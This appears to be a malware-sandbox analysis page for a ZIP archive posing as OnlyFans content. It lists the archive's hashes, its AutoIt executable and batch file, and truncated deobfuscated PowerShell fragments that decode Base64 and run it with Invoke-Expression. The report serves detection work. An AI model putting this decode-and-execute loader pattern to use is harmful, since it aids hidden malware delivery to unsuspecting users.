Malicious
Malicious

OnlyFans- Uma North.zip

ZIP Archive
|
MD5: a9d64ae6c494a5fe4e19e7ed4dc278c1
|
Size: 566.41 KB
|
application/zip

Zip Archive
Executable
AutoIt
PE (Portable Executable)
PowerShell
DeObfuscated
Print
General
Structural Analysis
Config.0
Yara Rules8
Sync
Community
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
 Hash Value
MD5
a9d64ae6c494a5fe4e19e7ed4dc278c1
Sha1
78b55eb6c07f473287131a74ff4664013aa35648
Sha256
47e657db8b338bc174dcce4d2d0b3fb6b1dd18fc1fa7b6a9e2e3863d963939c5
Sha384
1f021849b46af7f2681db05bfd700b1b2edb05786c3ce6194d6cabfd35e62a3d67b7bc06967c57aab4acd39c1fb7e365
Sha512
e402a617b50639d6b98f3fdea487b556d58ece9fa9a23501cbd964b575f98afcd5cbbf43075efe20ca918ae142b8e63af5ac26640b85842ee02346fc8a857740
SSDeep
12288:Pi3Stk9Bxv6RYb7QgZXNm7Mel1B6z6zItzlnOPzZwo:PiiyliRiZ+trB6PBnOPVwo
TLSH
47C423B077D98877C1D09AB4C761005CDED60933B4997293CEB1A6FA19F824CB29E3D9
File Structure
OnlyFans- Uma North.zip
Zip Archive
Executable
AutoIt
PE (Portable Executable)
PowerShell
DeObfuscated
Malicious
OnlyFans- Uma North
Malicious
ReadmeHere
Malicious
xxTorrentCoverbooks435
Archive Entry
Executable
AutoIt
PE (Portable Executable)
Win 64 Exe
x64
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rdata
.data
.pdata
.rsrc
.reloc
Resources
RT_ICON
ID:0001
ID:2057
ID:0002
ID:2057
ID:0003
ID:2057
ID:0004
ID:2057
ID:0005
ID:2057
ID:0006
ID:2057
ID:0007
ID:2057
ID:2057-preview.png
ID:0008
ID:2057
ID:0009
ID:2057
ID:000A
ID:2057
ID:000B
ID:2057
ID:000C
ID:2057
ID:000D
ID:2057
RT_MENU
ID:00A6
ID:2057
RT_DIALOG
ID:03E8
ID:2057
RT_STRING
ID:0007
ID:2057
ID:0008
ID:2057
ID:0009
ID:2057
ID:000A
ID:2057
ID:000B
ID:2057
ID:000C
ID:2057
ID:0139
ID:2057
RT_GROUP_CURSOR4
ID:0063
ID:2057
ID:00A2
ID:2057
ID:00A4
ID:2057
ID:00A9
ID:2057
RT_VERSION
ID:0001
ID:2057
RT_MANIFEST
ID:0001
ID:1033
xxTorrentCoverbooks435.bat
Archive Entry
xxxTorrentCoverbooks435
Archive Entry
PowerShell
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[PowerShell Command]
PowerShell
Contains Base64 Block
Base64 Block
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Contains Base64 Block
Base64 Block
Malicious
[Base64-Block]
Base64 Block
PowerShell
DeObfuscated
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
[Deobfuscated PS]
DeObfuscated
PowerShell
Malicious
Artefacts
Name
 Value
Deobfuscated PowerShell

oding]::unicode.getstring ([Convert]::"FromBase64String"($encodedScript)) Invoke-Expression $decodedScript $encodedScript = "JABiAGEAcwBlADYANAB"
Deobfuscated PowerShell

oding]::unicode.getstring ([Convert]::"FromBase64String"($encodedScript)) Invoke-Expression $decodedScript $encodedScript = "JABiAGEAcwBlADYANAB"
Deobfuscated PowerShell

ript "=" "[System.Text.Encoding]::Unicode.GetString" ([Convert]::"FromBase64String"($encodedScript)) Invoke-Expression $decodedScript $encodedScript
Deobfuscated PowerShell

ript "=" "[System.Text.Encoding]::Unicode.GetString" ([Convert]::"FromBase64String"($encodedScript)) Invoke-Expression $decodedScript $encodedScript
Deobfuscated PowerShell

qaaqbvag4a $decodedscript = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($encodedscript)) invoke-expression $decode
Deobfuscated PowerShell

qaaqbvag4a $decodedscript = [Encoding]::"unicode"."getstring"([Convert]::"frombase64string"($encodedscript)) Invoke-Expression $decode
Deobfuscated PowerShell

qaaqbvag4a $decodedscript = [Encoding]::"unicode"."getstring"([Convert]::"frombase64string"($encodedscript)) Invoke-Expression $decode
Deobfuscated PowerShell

odedscript "=" "[System.Text.Encoding]::Unicode.GetString" ([Convert]::"FromBase64String"($encodedScript)) Invoke-Expression $decodedScript $encod
Deobfuscated PowerShell

odedscript "=" "[System.Text.Encoding]::Unicode.GetString" ([Convert]::"FromBase64String"($encodedScript)) Invoke-Expression $decodedScript $encod
Deobfuscated PowerShell

dedscript "=" "[System.Text.Encoding]::Unicode.GetString" ([Convert]::"FromBase64String"($encodedScript)) Invoke-Expression $decodedScript $en
Deobfuscated PowerShell

dedscript "=" "[System.Text.Encoding]::Unicode.GetString" ([Convert]::"FromBase64String"($encodedScript)) Invoke-Expression $decodedScript $en
Deobfuscated PowerShell

wpubwhuzm5rzg5hywqiciagicagicagicagih0kicagicagicbdciagicb9cl0kj0a7 invoke-expression ([system.text.encoding]::utf8.getstring([system.convert]::from
Deobfuscated PowerShell

wpubwhuzm5rzg5hywqiciagicagicagicagih0kicagicagicbdciagicb9cl0kj0a7 Invoke-Expression ([Encoding]::"utf8"."getstring"([Convert]::"from"))
Deobfuscated PowerShell

wpubwhuzm5rzg5hywqiciagicagicagicagih0kicagicagicbdciagicb9cl0kj0a7 Invoke-Expression ([Encoding]::"utf8"."getstring"([Convert]::"from"))
Deobfuscated PowerShell

zablagmacgb5ahaadablagqargb1ag4aywb0agkabwbuaa== $decodedscript = [system.text.encoding]::unicode.getstring([system.convert]::frombase64string($enco
Deobfuscated PowerShell

zablagmacgb5ahaadablagqargb1ag4aywb0agkabwbuaa== $decodedscript = [Encoding]::"unicode"."getstring"([Convert]::"frombase64string"($enco))
Deobfuscated PowerShell

dedscript Invoke-Expression $decodedScript Start-Job -ScriptBlock your-lastfunction
Deobfuscated PowerShell

dedscript Invoke-Expression $decodedScript Start-Job -ScriptBlock "your-lastfunction"
Deobfuscated PowerShell

dedscript Invoke-Expression $decodedScript Start-Job -ScriptBlock "your-lastfunction"
OnlyFans- Uma North.zip (566.41 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙